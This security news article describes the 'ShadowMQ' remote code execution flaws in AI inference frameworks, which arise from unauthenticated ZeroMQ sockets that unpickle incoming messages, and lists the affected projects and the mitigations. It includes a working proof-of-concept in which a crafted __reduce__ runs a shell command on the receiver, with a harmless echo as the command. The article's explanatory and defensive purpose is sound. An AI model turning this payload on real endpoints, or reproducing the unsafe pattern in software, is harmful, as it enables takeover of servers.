Critical RCE Vulnerabilities Discovered in Major AI Frameworks from Meta, NVIDIA, and Microsoft

As artificial intelligence (AI) continues to revolutionize industries, the security of its underlying infrastructure has become paramount. Recent research by Oligo Security has unveiled a series of critical Remote Code Execution (RCE) vulnerabilities, collectively termed ShadowMQ, affecting prominent AI inference frameworks from Meta, NVIDIA, and Microsoft, as well as open-source PyTorch-ecosystem projects such as vLLM and SGLang.

The Genesis of ShadowMQ

The vulnerabilities originate from the unsafe combination of ZeroMQ (ZMQ) communications with Python’s pickle deserialization. ZMQ is a high-performance messaging library used extensively in AI frameworks for inter-process communication. ZMQ itself is not the flaw; however, when messages arriving on an exposed, unauthenticated ZMQ socket are deserialized with pickle, the socket becomes a conduit for malicious code execution.

The issue first came to light in 2024 during an analysis of Meta’s Llama Stack. Researchers discovered that the framework used ZMQ’s `recv_pyobj()` method, which deserializes incoming data with Python’s pickle module. Because pickle can execute arbitrary code during deserialization, any attacker able to reach the unauthenticated network socket can send a crafted payload that runs commands on the host, providing a direct entry point for remote code execution.
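
The pattern can be illustrated in a few lines of pyzmq. The sketch below is not code from Llama Stack or any other affected project; the socket types, loopback address, and port are arbitrary choices for the example, and the payload merely echoes a message rather than doing anything harmful. It shows how an object with a crafted `__reduce__` method, serialized by `send_pyobj()`, executes a command the moment the receiver calls `recv_pyobj()`.

```python
"""Minimal, self-contained illustration of the unsafe ZMQ + pickle pattern.
Illustrative only -- not code from Llama Stack or any other affected project."""
import os
import zmq


class Exploit:
    # pickle calls __reduce__ during deserialization, so unpickling this object
    # makes the *receiver* invoke os.system with an attacker-chosen command.
    def __reduce__(self):
        return (os.system, ("echo 'arbitrary command executed on the receiver'",))


ctx = zmq.Context()

# "Server" side: the vulnerable pattern -- a bound socket whose messages are
# deserialized with recv_pyobj() (pickle.loads under the hood).
server = ctx.socket(zmq.PULL)
server.bind("tcp://127.0.0.1:5555")   # in the affected frameworks, reachable over the network

# "Attacker" side: send_pyobj() pickles the crafted object and ships it over.
attacker = ctx.socket(zmq.PUSH)
attacker.connect("tcp://127.0.0.1:5555")
attacker.send_pyobj(Exploit())

server.recv_pyobj()   # unpickling the payload runs the command above
```

No bug in ZMQ itself is involved; the code execution comes entirely from pickle trusting whatever bytes arrive on the socket.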

Proliferation Across AI Frameworks

Following the identification of this vulnerability in Meta’s Llama Stack (CVE-2024-50050), Oligo Security extended their investigation to other AI frameworks. Alarmingly, they found that the same insecure pattern had propagated across multiple platforms:

– vLLM: An open-source library for efficient LLM inference, found to have similar vulnerabilities.

– NVIDIA’s TensorRT-LLM: A high-performance deep learning inference library, also affected.

– Modular’s Max Server: A server designed for AI model deployment, containing the same flaws.

– Microsoft’s Sarathi-Serve: An LLM serving platform, also found to contain the flaw.

– SGLang: An inference framework used by major tech companies, also affected.

The widespread nature of this vulnerability is attributed to code reuse and copy-paste development practices. Oligo’s code analysis revealed that entire files containing the flawed implementation were copied between projects, effectively spreading the security flaw across the AI ecosystem.

Potential Impact

The implications of these vulnerabilities are profound. AI inference servers are integral to enterprise infrastructure, processing sensitive data across GPU clusters. Successful exploitation could allow attackers to:

– Execute Arbitrary Code: Run malicious commands on the affected systems.

– Escalate Privileges: Gain higher-level access within the system.

– Exfiltrate Model Data: Steal proprietary AI models and associated data.

– Deploy Malware: Install cryptocurrency miners or other malicious software.

Organizations utilizing these frameworks include major companies and research institutions such as xAI, AMD, NVIDIA, Intel, LinkedIn, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, MIT, Stanford, and UC Berkeley. The potential for widespread disruption underscores the critical nature of these vulnerabilities.

Current Status and Recommendations

While Meta has patched the vulnerability in its Llama Stack, other frameworks remain at risk. Microsoft’s Sarathi-Serve and SGLang, in particular, either have incomplete fixes or remain unpatched.

To mitigate the risks associated with ShadowMQ, organizations are advised to:

1. Update to Patched Versions: Ensure all AI frameworks are updated to versions that have addressed these vulnerabilities.

2. Avoid Untrusted Deserialization: Refrain from using Python’s pickle module with data from untrusted sources; prefer schema-based formats such as JSON (a sketch combining this with recommendation 3 follows the list).

3. Implement Authentication: Configure ZMQ communications to require authentication (for example, ZMQ’s CURVE mechanism), preventing unauthorized access.

4. Restrict Network Access: Limit exposure by restricting network access to ZMQ endpoints, reducing the attack surface.
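
Recommendations 2 and 3 can be combined at the messaging layer. The sketch below is a minimal illustration rather than a drop-in fix for any specific framework: it assumes pyzmq built against a libzmq with CURVE (libsodium) support and uses placeholder loopback addresses. It replaces pickle-based `recv_pyobj()` with schema-based `recv_json()` and enables CURVE so traffic is encrypted and only clients the authenticator accepts can connect.

```python
"""Sketch of mitigations 2 and 3: JSON instead of pickle, plus ZMQ CURVE auth.
Assumes pyzmq built with CURVE (libsodium) support; addresses are placeholders."""
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator

ctx = zmq.Context()

# Generate CURVE keypairs (in practice, generate once and distribute securely).
server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()

# Start an authenticator; for the demo we accept any client that speaks CURVE.
# In production, point `location` at a directory of trusted client public keys.
auth = ThreadAuthenticator(ctx)
auth.start()
auth.allow("127.0.0.1")    # additionally restrict by source address
auth.configure_curve(domain="*", location=zmq.auth.CURVE_ALLOW_ANY)

# Server socket: requires CURVE and never unpickles anything.
server = ctx.socket(zmq.PULL)
server.curve_secretkey = server_secret
server.curve_publickey = server_public
server.curve_server = True
server.bind("tcp://127.0.0.1:5556")

# Client socket: must present a keypair and know the server's public key.
client = ctx.socket(zmq.PUSH)
client.curve_secretkey = client_secret
client.curve_publickey = client_public
client.curve_serverkey = server_public
client.connect("tcp://127.0.0.1:5556")

client.send_json({"task": "generate", "prompt": "hello"})
request = server.recv_json()    # json.loads: plain data, no code execution
print(request)

auth.stop()
```

In a real deployment, client public keys would be distributed out of band and `configure_curve()` pointed at a directory of those keys rather than `CURVE_ALLOW_ANY`, and incoming JSON payloads would be validated against a schema before use.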

The discovery of ShadowMQ serves as a stark reminder of the importance of secure coding practices and thorough security audits, especially in the rapidly evolving field of artificial intelligence.